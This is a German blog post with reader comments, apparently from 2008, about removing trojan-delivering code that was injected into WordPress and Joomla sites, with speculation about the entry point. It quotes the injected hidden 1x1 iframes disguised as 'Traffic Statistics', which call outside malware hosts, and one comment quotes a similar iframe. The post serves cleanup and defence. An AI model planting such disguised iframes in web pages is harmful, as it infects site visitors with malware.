Trojaner-Warnungen können Nerven, Zeit und Kopfschmerzen kosten. Auf den von mir verwalteten WordPress-Blogs http://fv-bakum.de und http://feuerwehr-bakum.de schlich sich böser Code ein. Beide laufen auf einem auf einem 1&1-Webspace installierten WordPress-System. Besucher sprachen mich immer wieder darauf an, dass ein Trojaner auf meinen Seiten wäre.
Es handelte sich um den Trojaner “TR/Dldr.HTML.Agent.IS”. Falls Ihr Antivirenprogramm beim Besuch einer Internetseite alarmiert hat, benachrichtigen Sie bitte den Webmaster mit einem Hinweis auf diese Seite. Wie Sie als Webmaster diesen Trojaner aus Ihrem Blog entfernen können, erfahren Sie unten am Ende des Beitrags.
Ich konnte mir dies gar nicht denken, aber weil sich diese Warnungen häuften, beschloss ich der Sache auf den Grund zu gehen. Da ich aus Sicherheitsgründen immer mit dem Firefox-Browser von einem eingeschränkten Nutzerkonto aus ins Internet gehe, hat mich mein Antivirenprogramm Antivir nie vor einem gefährlichen Trojaner gewarnt. Anscheinend mag der den Firefox nicht.
Ich erkundigte zunächst mich im WordPress-Deutschland-Forum. Dort waren die Reaktionen erst ratlos. Ein Trojaner habe man nicht auf meinen Seiten gefunden. Einer fand aber dann doch eine solch gefährliche Warnung. Anscheinend surfen die Spezis in diesem Forum wohl auch nicht mit dem Internet Explorer.
Nun wechselte ich in das Administrationskonto und rief mit dem Internet Explorer 7 beide Seiten auf. Leider ist dies ja immer noch der übliche und ziemliche unsichere Weg des Normalnutzers von Computern in das Internet. Und sofort warnte mich Antivir: Das “Trojanische Pferd TR/Dldr.HTML.Agent.IS” verlangte den Zugriff auf meinen Rechner. Zur großen Darstellung der Warnung …
Ich hatte bereits Stunden verwandt, um alle Dateien meiner WordPress-Installationen (mit den dazu notwendigen Datensicherungen) auszutauschen. Jedoch war dies erfolglos. Der Trojaner wollte nicht weichen. Nach einigen Rückfragen im WordPressforum stellte sich heraus: Ein böser Code wurde einfach mit einem Verweis auf eine Script-Datei in meinen Beiträgen eingebettet, mit der anscheinend dieser Trojaner in fremde Rechner geschleust wird:
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> oder
<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>
Wenn man diesen Quellcode liest glaubt man, es handle sich um eine Statistikfunktion von WordPress. Doch da irrt man gewaltig. Die Domains wp-stats-php.info bzw. http://61.155.8.157 sind in China registriert. Beim Aufruf eines derart infizierten Beitrags wundert man sich, dass die Ladezeit erheblich verlängert wird. In der Statuszeile des Browsers erscheint “wp-stats …info”. Da dies so ähnlich aussieht wie eine interne WordPress-Funktion, schöpft man nicht so schnell Verdacht, dass in diesem Moment ein Trojaner von einer chinesischen Quelle aus dem Rechner eingeschleust wird.
Ein einfacher Blick in den Seitenquelltext eines Beitrags reicht aus, diesen schädlichen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die “infizierten” Beiträge sofort entfernt. Bei einem Update der WordPress-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der WordPress-Dateien auch nicht beseitigt werden sondern nur, indem man die betroffenen Beiträge entfernt.
Der Code versteckt sich im HTML-Code eines Beitrags, welcher nach Erzeugung durch das WordPress-Script in der mysql-Datenbank abgelegt und gespeichert wird. Wird der Beitrag aus der Datenbank abgefragt, wird auch wieder der in der Datenbank abgelegte böswillige und für den normalen Nutzer nicht sichtbare Code im Beitrag hinzugefügt. Der Code versteckt sich also in der Datenbank und nicht direkt in den Script-Dateien von WordPress.
Das gleiche Problem ist übrigens nicht nur bei WordPress-Blogs sondern auch bei Homepages, die mit Joomla verwaltet werden, aufgetreten.
Nur was soll man jetzt noch machen? Wo ist die Sicherheitslücke? Wie kommt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein WordPress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.
Um den “Trojaner” aus Ihrem Blog zu löschen, rufen Sie mit Ihrem Browser die Seiten mit Ihren Beiträgen auf. Bei den WordPress-Blogs sind dies standartmäßig die Startseite und bei vielen Beiträgen die weiter gelinkten Fortsetzungsseiten. Nun müssen Sie sich den Quelltext dieser Seite ansehen. Klicken Sie dazu mit der rechten Maustaste auf die Seite und wählen Sie “Quellcode anzeigen” aus. Der Quellcode wird angezeigt. Schauen Sie nach, in welchem Beitrag der Quellcode
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe>” oder ähnlich, z.B.:
<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>
vorhanden ist. Melden Sie sich jetzt in Ihren Blog an und löschen Sie den betreffenden Beitrag aus Ihrem Blog. Alternativ können Sie auch nur den böswilligen Code aus dem HTML-Code des befallenen Beitrag entfernen, wenn sie den Beitrag nicht löschen möchten. Damit haben Sie den Code gelöscht, über den der Trojaner in Ihr Blog eindringt. Für die Folgen bei Anwendung dieses Hinweises übernimmt der Verfasser keinerlei Haftung.
Update 04.04.2009: Die Sicherheitslücke scheint nicht im WordPress-Skript sondern im FTP:-Protokoll zu liegen. Mit FTP lädt man die Skript-Dateien auf den Server. Anscheinend ist es für die Hacker möglich, den Zugang zu einem Server zu knacken, wenn er das Zugangsasswort herausfindet. Dann kann jede Datei auf dem Webserver manipuliert werden. Dies berichtet Florian Flegel in seinem Beitrag Wer braucht ein AntiVirus-Plugin für WordPress?
Diese Erklärung ist sehr plausibel, zugleich ist dies der Gau des Internets. Denn dann ist jede Website, die auf einem lokalen Webserver gespeichert wird, potentiell manipulierbar. Ich musste diese unangenehme Erfahrung auch bei HTML-Homepages machen. In den Seiten wurde einfach schädlicher Code eingefügt. Es ist mir immer nach schleierhaft, wie die Angreifer die FTP-Zugangspasswörter, die aus reinen Buchstaben/Zahlenkombinationen bestanden, “errieten”. Flegels Rat zum Schließen dieser Lücke sind “sichere FTP-Passwörter”.
Demnach müssten die drei Passwörter des FTP- Zugangs, der MyQsl-Datenbank und des Zugangs zu WordPress “sicher” geändert werden, um das System “virendicht zu machen”. Webmaster aller Länder, wechselt Eure Passwörter! Ist dies wirklich der Schlüssel zum Erfolg?
Montag, 4. Februar, 2008 um 11:26 |
Außerdem war auch noch in einem anderen Beitrag irgendwelcher Kauderwelsch in Spanisch auf mir unerfindliche Art und Weise in unser Feuerwehrblog eingeschleust worden. So nach dem Motto: WordPress-Nutzern will ich mal zeigen, wie einfach ihre Homepage durch Fremde manipuliert werden kann. Wenn also eines Tages die komplette Seite weg ist, würd mich dies nicht wundern. Nun versteh ich auch, warum man immer ein Backup von der Datenbank und den Daten auf dem Webspace machen soll …
Dienstag, 5. Februar, 2008 um 8:16 |
Heute erhielt ich wieder einen Kommentar in unserem Feuerwehrblog. Ich sah sofort im Beitrag nach und fand direkt im Beitragstext einen angeblichen Google-Link zu einer Seite mit Telefonmelodien, der wieder aus unerfindlichen Gründen auf diese Seite eingeschleust wurde. Ich vermute, dass die Kommentar- und Trackbackfunktionen bei WordPress die Sicherheitslücken sind. Ich werde daher diese Funktionen deaktivieren, so schade dies auch ist. Denn so wird ein Stück an WordPress – Möglichkeiten zerstört. Nachtrag: Wie sich später herausgestellt hat, war die Kommentarfunktion
nicht b.z.w.nicht die einzige “Sicherheitslücke” im Blog. Mehr im Kommentar unten …Dienstag, 5. Februar, 2008 um 6:40 |
Im WordPress-Forum erhielt ich auf meine obig geschilderten Probleme die lapidare Äußerung “Dann ist Dein Server offen wie ein Scheunentor.” Soll wohl heißen, wechsele deinen Internethoster. Naja, auch keine wirklich hilfreiche Äußerung. Bin ein wenig sauer, dort so abgespeist zu werden. Wenns WordPress nicht ist, muß es ja woanders daran liegen. Bei meinen HTML-Projekten hatte ich derartige Probleme allerdings nie. Da war der Server bislang wohl dicht. Also doch zumindest teilweise ein WordPress – Problem?! Bei Joomla liest man das gleiche. Jedenfalls hilft da auch kein Updaten von WordPress. Dass das WPD-Forum Nutzern, die keine Internetspezialisten sind, nicht weiterhilft, kann man auch daran erkennen, dass die woanders weiter suchen. Sonst würden nicht so viele Leute täglich diesen Beitrag aufrufen …
Montag, 10. März, 2008 um 2:19 |
Hallo Schorsch!
Ich hatte gleiches Problem in einem Blog von mir. Konntest Du zwischenzeitlich ausfindig machen wie der Code in den Beitrag kommt? Welche WP Version war davon betroffen?
i.Ü. wird derzeit auch auf dem SEO Marketing Blog http://seo-marketing-blog.de/goatix/wordpress-mit-trojaner-an-bord-der-google-malware-rettungsanker ebenso über das Thema diskutiert. Speziell interessant in diesem Zusammenhang auch das Verhalten von Google. Ich weiß nicht, ob Dir das schon bekannt war.
Montag, 10. März, 2008 um 2:20 |
habe gerade nochmals deinen Beitrag gelesen. War bei Dir der Code in einem Kommentar? Bei mir war der Code direkt im Artikel integriert, also nicht über die Kommentarfunktion.
Montag, 10. März, 2008 um 2:34 |
@Jörg,
Danke für deinen Kommentar in meinem Blog. Leider habe ich die genaue Ursache dieser Sicherheitslücke nicht gefunden. Genau wie bei Dir wurde der Code direkt im Beitrag, also im Artikel, nicht also im Kommentar hinzugefügt. Kurz zuvor wurden einige einige merkwürdige Trackbacks fremder Websites in meine Blogs geposted. Ich verrmute, dass über diesen Weg in meine Blogs “eingebrochen” wurde. Ich habe deshalb alle Kommentarfunktionen deaktiviert. Bislang habe ich seitdem keinerlei Probleme dieser Art mehr.
Bereits einen Tag, nach dem ich diesen Kommentar geschrieben habe, wurde wieder in mein Fischereivereinsblog eingebrochen. Obwohl ich alle Kommentarfunktionen deaktiviert habe, wurde von einem Hacker ein Link zu Klingeltönen und spanischer Kauderwelsch in einen Beitrag eingefügt.
So nach dem Motto:
Wer weiß, wie die Leute fremde Blogs einbrechen können und wie man dies verhindert, sollte in meinem Blogbeitrag einen Kommentar hinzufügen. Denn viele Leute suchen nach einer Lösung.
Dienstag, 11. März, 2008 um 10:26 |
Schorsch,
schau doch mal ob du merkwürdige, dir nicht bekannte Nutzer (z.B. registrierte User) bei Deinem WP hast.
Dienstag, 11. März, 2008 um 10:27 |
user = Leser
Dienstag, 11. März, 2008 um 11:43 |
Hallo,
ich bin auch von dem Trojaner heimgesucht worden – mit dem Ergebnis, dass ich jetzt hunderte Backlinks von ebenfalls gehackten Seiten habe.
Ich erkläre es mir folgenermaßen:
Unter dem Menüpunkt “Einstellungen” hatt ich unter der Option “Mitgliedschaft” einen Haken bei “Jeder kann sich registrieren”. Ich denke, dass dies die Sicherheitslücke war. Was meint Ihr?
Bei mir wurden Beiträge mit Klingeltonwerbung erstellt – auf diese Beiträge wurde dann von gehackten Gästebüchern etc. massiv verlinkt.
In dieser Zeit sank mein Traffic über Google um ca. 50% & mein Pagerank sank von 3 auf 0.
Nachdem ich das System bereinigt hatte, habe ich eine Mail an Google geschickt und den Vorfall geschildert. Folge: Nach einigen Tagen erholte sich mein Traffic – mein Pagerank wurde allerdings nicht wieder hochgesetzt.
Dienstag, 11. März, 2008 um 12:06 |
@Jörg und Harald
Danke für Eure Tipps! Ich habe die unbekannten Benutzer im Fischereiblog gelöscht und die Registriermöglichkeit in den Einstellungen abgeschaltet. Schaun wir mal, was jetzt passiert. Ich befürchte, die Sicherheitslücke könnte noch woanders liegen. Eines steht in jedem Falle fest: Die “Einbrüche” dieser Hacker führen dazu, dass dies sich in jedem Falle sehr nachteilig auf die Gewichtung der betroffenen Websites in den Suchmaschinen und damit auf die Besucherstatistik auswirkt. Das nun ausgerechnet Blogs von Privaten und Vereinen dafür genutzt werden, ist schon übel.
Donnerstag, 13. März, 2008 um 4:49 |
[...] Geschichte ohne Ende Seit Wochen beschäftigt mich der Kampf gegen Spam in von mir betriebenen WordPress-Weblogs. Betroffen sind außer mir vor allem viele andere zumeist private Leute, die ihr WordPress-Blog auf [...] In einem weiteren Beitrag “Eine Geschichte ohne Ende” habe ich meine weiteren Aktivitäten zur Sicherung meiner WordPress-Installationen zusammengefaßt. Zum Beitrag …
Donnerstag, 24. April, 2008 um 10:34 |
Hallo,
danke erst mal für die Tipps. Habe das gleiche Problem. Und den Eintrag des Trojaners auch gefunden.
Alleridings weiß ich nicht wie ich ihn löschen kann.
Habe ein PHP-Kid-Forum und im Quellcode direkt auf der Startseite befindet sich der Trojaner.Der gleiche Eintrag wie oben beschrieben. WO aber kann ich ihn finden um ihn zu löschen???
Bin für jede Hilfe dankbar!!
Lieben Dank, Marita
Freitag, 25. April, 2008 um 3:46 |
1. Erst einmal sollte die infizierte Seite aus dem Netz entfernt werden, solange das Problem nicht aus der Welt ist. Schließlich können sich die Besucher mit dem Trojaner infizieren. Das ist das mindeste, was man verlangen kann!
Außerdem ist dies sinnvoll in eigenem Interesse, denn Google markiert die Seite mit dem Vermerk “Virenverseucht” und sortiert solche Seiten aus. Effekt: Man wird nicht mehr besucht.
2. Ich vermute, dass dies keine WordPress-basierte Seite ist. Es könnte sein, dass das ganze PHP-Skript ausgetauscht werden muss, da der PHP-Code manipuliert wurde. Die gleiche Erfahrung habe ich mit dem Coppermine (Bildergalerie-Skript) selbst erlebt. Mein Tipp: Am besten, an den Programmierer des Skriptes wenden ..
Freitag, 25. April, 2008 um 11:55 |
Danke dir, aber so schnell wollte ich nun doch nicht die Seite aus dem Netz nehmen. Habe den Trojaner nun erfolgreich entfernt. Er saß in einer meiner 44 Datenbänke und es hat eine Menge Zeit gekostet den Eintrag zu finden. Aber dank dieses Threads wusste ich ja wonach ich suchen muss und somit ist er nun gekillt. *freu*
Danke für diesen hilfreichen Thread!!!! DANKE!!!
Samstag, 26. April, 2008 um 8:54 |
Gratulation! Freut mich, dass mein Blogartikel dir geholfen hat. Du schriebst:
… aber so schnell wollte ich nun doch nicht die Seite aus dem Netz nehmen….
Man sollte so etwas nicht so auf die leichte Schulter nehmen, schließlich können auf diese Weise möglicherweise gefährliche Schadprogramme auf die Rechner deiner Gäste geladen werden, die sie für eine vertrauensvolle Seite hielten. Man sollte zumindest den Link zum infizierten Teil aus dem Hauptmenu einer Homepage entfernen, bis man den Code entfernen konnte. Ich finde, dies ist eigentlich eine Selbstverständlichkeit. Nur mal zum Nachdenken füralle Leute, die in die gleiche Situation gekommen sind.
Samstag, 12. Juli, 2008 um 4:47 |
[...] Tod einer Website Eine meiner am meisten gelesenen Beiträge ist zur Zeit der Artikel “Böser Code im WordPress Blog“. Verzweifelte WordPress nutzer finden dort die Lösung zum Problem, wie sie ihr Blog von [...]
Montag, 14. Juli, 2008 um 11:51 |
[...] grosenbaum am 13. Juli 2008 um 21:53 – [...]
Montag, 14. Juli, 2008 um 5:54 |
Erstmal vielen Dank für die aufschlussreichen Artikel inkl. der Veröffentlichung des schädlichen Codes und des Links zum Joomla-Thread!!! Bei meiner Joomla Site wurde wohl eine unsichere Erweiterung ausgenutzt, das Löschen des iframes alleine reicht nicht – im Verzeichnis der Komponente wurde eine neue Datei abgelegt (am Datum leicht erkennbar) – diese habe ich ebenso entfernt. Diese Datei hat wohl auch zumindest eine Einstellung in der Datei globals.php geändert, die ich rückgängig machen musste.
Wer weiß, was noch alles manipuliert wurde – aber als 1. Hilfe sollte das erst mal reichen. Letztlich muss man natürlich das Einfallstor schließen…
Montag, 14. Juli, 2008 um 9:45 |
Dies ist ein interessanter Hinweis von Peter: Anscheinend wurde bei Peters Joomla-Website nicht nur die Datenbank sondern auch das Joomla-PHP-Script manipuliert. Bislang war ich davon ausgegangen, dass bei diesem Hack nur die Datenbank manipuliert wird, nicht aber das PHP-Skript sebst. Möglicherweise wird bei Joomla der Angriff auch anders angelegt als bei WordPress? Oder ist inzwischen der Angriff weiterentwickelt worden?
Dienstag, 15. Juli, 2008 um 1:40 |
[...] Macht nen gründlichen Virencheck!Scheint übrigens ein WordPress Problem zu sein. Dieser Artikel erklärt das ganz gut. Vielen Dank von mir an dieser [...]
Dienstag, 15. Juli, 2008 um 2:21 |
Inzwischen ist der Chinesen -Trojaner nicht nur auf WordPress- und Joomla-Seiten aus, sondern dringt auch in Foren, die mit phpbb betrieben werden ein. zur Meldung im Drachenwacht Gildeforum …
Mittwoch, 16. Juli, 2008 um 1:44 |
Vielen Dank für die gute Anleitung, ich habe mich schon halb dusselig gesucht. Nun funktioniert es wieder. Bei mir hat es sich auch in den Beitragstext eingeschleust. Nicht nur die Chinesen, sondern mindestens 20 weitere Links. Könnte sein, dass es vorher eine nicht aktuelle WordPress-Version war. Nun habe ich das Update auf 2.6.
Mittwoch, 16. Juli, 2008 um 3:19 |
Noch ein Nachtrag zu meinem Post von Montag:
In der Joomla Installation wurde übrigens bei der Attacke ein Modul erstellt, welches den iframe enthielt. Desweiteren habe ich nun noch anderen Schadcode im Template gefunden: wieder ein iframe, der die Seite “http://in-in.in/in/” lädt. Mit ebenso bösen Folgen wie bei wp-stats, versteht sich! Bei der Bearbeitung der Templatedatei in Dreamweaver hat sich offensichtlich ein Boot-Virus auf meinem PC aktiviert! Die betroffenen Dateien auf dem Server konnte ich relativ leicht am selben Datum erkennen. Wer also eine schädliche Datei findet, sollte vielleicht mal nach Dateien mit gleichem Datum suchen (z.B. mit WS_FTP Pro > Extras > Search Utility).
Freitag, 18. Juli, 2008 um 10:45 |
[...] WordPress Blogs sind immer mal wieder Opfer von solchen Angriffen. Wie man sein WordPress Blog einigermaßen vor Angriffen schützt erfährt man bei brajeshwar.com [...]
Samstag, 27. September, 2008 um 1:29 |
Hallo,
mein Chef hatte das selbe Problem auf seinem WordPress-Blog unter http://www.kryptozoologie.net/kryptofiction und er meinte, dass dies über einen Trackback eingefügt wurde.
Sonntag, 28. September, 2008 um 8:58 |
@Sabine:
Hallo, es ist nicht auszuschließen, dass die Lücke in der Kommentar- oder Trackbackfunktion von WordPress besteht.
Dienstag, 7. Oktober, 2008 um 8:26 |
[...] Aus mir nicht nachvollziehbaren Gründen hatte sich im Artikel “on hold” ein Link auf einen Trojaner versteckt. Es handelte sich offenbar um eine Sicherheitslücke von WordPress. Leider konnte ich nicht herausfinden, ob der Trojaner Schaden anrichtet. Ich bitte alle Leser mit einem Antivirenprogramm Ihren Rechner zu prüfen. Weitere Informationen. [...]
Dienstag, 23. Dezember, 2008 um 12:35 |
Mittlerweile scheint es einige Abwandlungen des Trojaners zu geben. html/dldr.agent.gd, tr/dldr.html.agent.mu, html/dldr.agent.jd und andere. Das Prinzip ist möglicherweise das gleiche. Über diese Suchanfragen wurde dieser Beitrag jedenfalls gefunden. Anscheinend ist zur Zeit wieder eine Trojanerwelle unterwegs.
Sonntag, 5. April, 2009 um 9:39 |
Das ist doch kein Fehler im FTP-Protokoll… Der Fehler ist vom Nutzer verursacht, wenn das Passwort leicht zu erraten ist.
Sonntag, 5. April, 2009 um 1:22 |
Ich habe in meinem Beitrag ja geschrieben, dass meine FTP-Zugangskennwörter aus reinen Zahlen- und Buchstabenkombinationen bestehen. Die kann selbst mein bester Freund nicht erraten. Wie kann dies ein Bot-Rechner, der mich privat gar nicht kennt? Was kann ein Nutzer noch besser machen? Irgendwas stimmt da doch nicht. Entweder ist WP oder MyQSL unsicher- Oder FTP ist unsicher. Man kann ja nicht alles auf den Nutzer schieben, wenn der alles tut, was in seinen Möglichkeiten liegt. Wahrscheinlich ist die Lücke im FTP, denn auch HTML-Seiten, die nicht per PHP oder MyQSL verwaltet werden, können mit Schadcode manipuliert werden.
Sonntag, 5. April, 2009 um 9:16 |
@Schorsch
Ich bin der Entwickler des AntiVirus-Plugins, das Dr.Web und Florian Irgendwas in ihrem Beitrag in Frage gestellt und die Nutzer abgeschreckt haben. Das, was du in deinem letzten Kommentar ansprichst, versuche ich die ganze Zeit durchzusetzen: Egal, ob man als Nutzer seinen Pflichten nachgegangen ist und ein superdupppppper sicheres Passwort gewählt hat, eine Zusatzlösung wie das AntiVirus-Plugin ist nur von Vorteil – immer! Eine manuelle Absicherung und maschinelle Sicherheitsaspekte sollen sich nicht ausschliessen, sondern sinnvoll erweitern.
Sonntag, 3. Mai, 2009 um 11:39 |
[...] Quelle: http://grosenbaum.wordpress.com/2008/01/23/boser-code-im-wordpress-blog/ [...]